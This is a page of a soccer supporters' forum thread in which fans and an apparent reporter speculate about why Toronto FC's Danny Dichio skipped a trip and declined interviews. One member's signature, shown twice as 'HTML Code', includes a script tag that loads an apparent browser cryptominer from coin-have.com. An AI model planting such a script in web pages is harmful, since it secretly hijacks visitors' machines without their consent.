Page 3 of 33 FirstFirst 123456713 ... LastLast
    Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

I'm not an athlete or a reporter, but from my experience in dealing with athletes when they don't want to talk... something is up.

By the same token, I hardly think TFC is cutting him.

More than likely, Dichio, as much of a team guy that he is, is upset over the way he's been handled in what is supposed to be his last year in professional football. He still has pride. I'm sure he feels that he can contribute.

But he can't come out and say that.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Brooker View Post
    Mystery Solved, Molinaro?

Not even close.
    that was the debate I had with my copy editor. She put that line in - not me.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Man these copy editors really do screw with you guys. The Star pulls the same crap as well.

Man, this whole Dichio thing is giving me a headache.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by johnmolinaro View Post
    I asked Michelle to interview Danny. She went into the locker-room after practice was done to tell him about the request. then she came out and told me he declined the request and said Dany doesn't want to do interviews today.

To answer your question, yes getting turned down for TFC player interviews at practice happens frequently.

Am I suspicious? Kind of 50/50 right now. If it's not true and Danny wanted to throw me off the trail, all he had to do was come out and back CC's story, and not talk to me.

Anyway, gonna keep digging on this one.
    Were you wearing that awful shirt? That might be why!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I am not sure I buy the personal reasons stuff. Why would he decline an interview and have someone else speak for him. This makes no sense. Either he says its personal reasons or the club speaks on his behalf. To me it smells as the public reason for him staying back, and DD not wanting to get into what is beneath the surface in reality, because he cant support that message in good faith...so he stays quiet. If it was personal reasons, they would have just simply said that and people would back off.

Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by Roogsy View Post
    Man these copy editors really do screw with you guys. The Star pulls the same crap as well.

Man, this whole Dichio thing is giving me a headache.
    Not defending reporters per se, but I did used to have thoughts of being one.

Writers just write the copy. Editors put in the headlines and edit of course.

Yet people bash the writers because of the headlines.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by wzhxvy View Post
    I am not sure I buy the personal reasons stuff. Why would he decline an interview and have someone else speak for him. This makes no sense. Either he says its personal reasons or the club speaks on his behalf. To me it smells as the public reason for him staying back, and DD not wanting to get into what is beneath the surface in reality, because he cant support that message in good faith...so he stays quiet. If it was personal reasons, they would have just simply said that and people would back off.
    Maybe, maybe not. If they came out with "personal reasons" there would be a whole slew of new speculations as to what is wrong with Danny and his situation. I am not sure that would be much better.

I don't know what's going on or whether there is a story here or not. But the fact that fans and the media don't trust the team and their official line speaks volumes about their credibility in my mind. There may not be a story here at all, I can totally believe that. But the way they behave, nobody believes them.

Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

Maybe, maybe not. If they came out with "personal reasons" there would be a whole slew of new speculations as to what is wrong with Danny and his situation. I am not sure that would be much better.

I don't know what's going on or whether there is a story here or not. But the fact that fans and the media don't trust the team and their official line speaks volumes about their credibility in my mind. There may not be a story here at all, I can totally believe that. But the way they behave, nobody believes them.
    But I think most people would give more credence to the personal reasons issue and back off.

i.e. Had to stay behind in Toronto to take care of some issue

A player not talking is usually bad news.

Players usually don't talk for two reasons.
    1) The team tells the player not to talk. There may be some team issue going on.

or

2) The player is upset over something related to him and doesn't want to pour gas over a fire.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Whoopee View Post
    or

2) The player is upset over something related to him and doesn't want to pour gas over a fire.
    like having a supporter group message board raising questions over team chemistry and what not????
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

LOL

I just figure Dichio is too much of a professional to throw people under the bus or stir up trouble.

But I think the silence from Dichio speaks volumes.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

LOL

I just figure Dichio is too much of a professional to throw people under the bus or stir up trouble.

But I think the silence from Dichio speaks volumes.
    it could simply be that he wants the full focus on their current run...
    HTML Code:

olegunnar

Quote Originally Posted by Boris View Post
    like having a supporter group message board raising questions over team chemistry and what not????
    Yeah I bet those sneaky editors 2nd choice for headline was:

Dichio refuses to speak to press over concerns internet rumours on fanboy site might rage out of control.

Editors...always screwing up the headlines.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

We trust Danny, right?

Let him handle it.
    “What the world needs is more geniuses with humility; there are so few of us left.”

Registered
    Mentioned
    0 Post(s)
    Tagged
    1 Thread(s)

Quote Originally Posted by Boris View Post
    it could simply be that he wants the full focus on their current run...
    That's why he doesn't want to stir shit up.

But rule of thumb is it's usually better to say something than nothing at all.

The worst thing you can do in some situations is to stay silent and/or just say "no comment".

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

That's why he doesn't want to stir shit up.

But rule of thumb is it's usually better to say something than nothing at all.

The worst thing you can do in some situations is to stay silent and/or just say "no comment".
    true - but lets just remember who tells them to talk or not.....ummm...you know what i mean...
    HTML Code:

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I don't know what's going on. Frankly, I don't care. All I care about is whether the team makes the playoffs. If they don't...heads should roll.

As for Danny...I know players and team employees read these boards all the time but I highly doubt the players get much of a chance to during the day while they are in training. So whatever the reason Danny didn't comment, I HIGHLY doubt it has anything to with hints he got that somehow this, or any other TFC supporter site, was musing about his absence. He had his reasons for not speaking. I don't know what they are nor will I speculate.

All I know is that this is just more fumbling by the team. The harder they try to hold on, the more systems will slip through their fingers!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Reason I say that is because I've had personal experience with the knee issue - well, not me someone I know.

The air cabin pressure is actually pretty hard on the body.

That's why if you have a punctured lung.... you CANNOT fly or you will die.

Concussions are also a major issue.

Plus other injuries, etc.
    ...not to mention with a punctured lung, a vacation is the last of your worries.

Hooooozaaaaah! I'm here all week folks.

Awaiting Confirmation
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I don't know what's going on. Frankly, I don't care. All I care about is whether the team makes the playoffs. If they don't...heads should roll.
    +1,000,000

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

As for Danny...I know players and team employees read these boards all the time but I highly doubt the players get much of a chance to during the day while they are in training. So whatever the reason Danny didn't comment, I HIGHLY doubt it has anything to with hints he got that somehow this, or any other TFC supporter site, was musing about his absence. He had his reasons for not speaking. I don't know what they are nor will I speculate.

All I know is that this is just more fumbling by the team. The harder they try to hold on, the more systems will slip through their fingers!

That's a totally random reference! You just wanted to post a photo of your Princess Leia fantasy Roogs!
    We are the Angry Mob, we read the papers every day
    We like who we like, we hate who we hate
    But we're also easily swayed

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

No, no, no...the fantasy pic is this one!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Saying Dichio is too old to travel now that hes pushing 35 is like saying, Stevie Y was too old to travel and all his injuries would flare up when flying to the west coast when he was at the end of this career too.

Sounds like a stupid cover up excuse for either a change of personnel or a Dichio personal issue, that might explain the silence from Dichio and the stupid explanation from CC.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Monztro View Post
    Saying Dichio is too old to travel now that hes pushing 35 is like saying, Stevie Y was too old to travel and all his injuries would flare up when flying to the west coast when he was at the end of this career too..
    Stevie Y played a full season only once in the six years before his retirement.
    And one of those seasons was the lockout, so no NHL games for a year... and one of those seasons he played only 16 games. He's also one of the greatest hockey players in the history of the NHL, a supreme athlete. Dichio is one tough mother, but he doesn't exactly have the fitness level of Stevie Y. Few do.

Not to mention that many NHL/NBA teams have direct charters. MLSE has a dedicated plane just for Raps and Leafs away games.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

dichio doesn't fit on planes, his head hits the top everytime

Gixmo

This whole situation smells like shit...

Maybe Cummins feels threatened.. Maybe Danny is hurt... Maybe there is more to it

Whatever it is, easy solution

Cummins out, Dichio in..

PB - Make it happen

(/Flamesuit on)

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Default Where there's smoke .....................

Quote Originally Posted by Monztro View Post
    Saying Dichio is too old to travel now that hes pushing 35 is like saying, Stevie Y was too old to travel and all his injuries would flare up when flying to the west coast when he was at the end of this career too.

Sounds like a stupid cover up excuse for either a change of personnel or a Dichio personal issue, that might explain the silence from Dichio and the stupid explanation from CC.
    Like Monztro states, this is a bullshit answer. Here is an interesting point. Before the last game there was no mention of Dichio being injurred and slotted as questionable to play.

This has been a totally weird season and something is not right. Why would a coach quit, 2 players ask to leave the team and now the biggest name on the team left off the squad for an important away match with not a word spoken about it before hand?

Mo or Cummings: Take your pick - There is trouble in the hen house.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by olegunnar View Post
    Considering this board is so anonymous and how people come here with agendas, I think it's valuable to remember identity and bias nuggets people drop.
    I've learned to automatically disregard the ones who have, as you said, dropped nuggets of their bias. It is the ones who have not done so who I find interesting to debate with.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

I heard he was killed by the butler, in the study, with the candlestick.

- Scott
    “Heroism breaks its heart, and idealism its back, on the intransigence of the credulous and the mediocre, manipulated by the cynical and the corrupt.” ~Christopher Hitchens

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Shakes McQueen View Post
    I heard he was killed by the butler, in the study, with the candlestick.

- Scott

Quote Originally Posted by ExiledRed
    yes they did..

Also, Parky, so you realise how easy it is to obfuscate truth while whenever someone questions something that is presented as truth, people like you start putting up pictures of tinfoil hats and start talking about aliens?

The guy doesn't trust Cummin's statement to the media as truth, so you liken him to a crazy guy who believes in aliens?

dear me....

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

What does ExiledRed's post have to do with mine?

I was trying to be funny, not controversial.

- Scott
    “Heroism breaks its heart, and idealism its back, on the intransigence of the credulous and the mediocre, manipulated by the cynical and the corrupt.” ~Christopher Hitchens

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by johnmolinaro View Post
    LOL. sorry! but if you saw Kay and spoke with her like I did, you would understand....
    Hope you weren't wearing the "I'm a sports reporter shirt".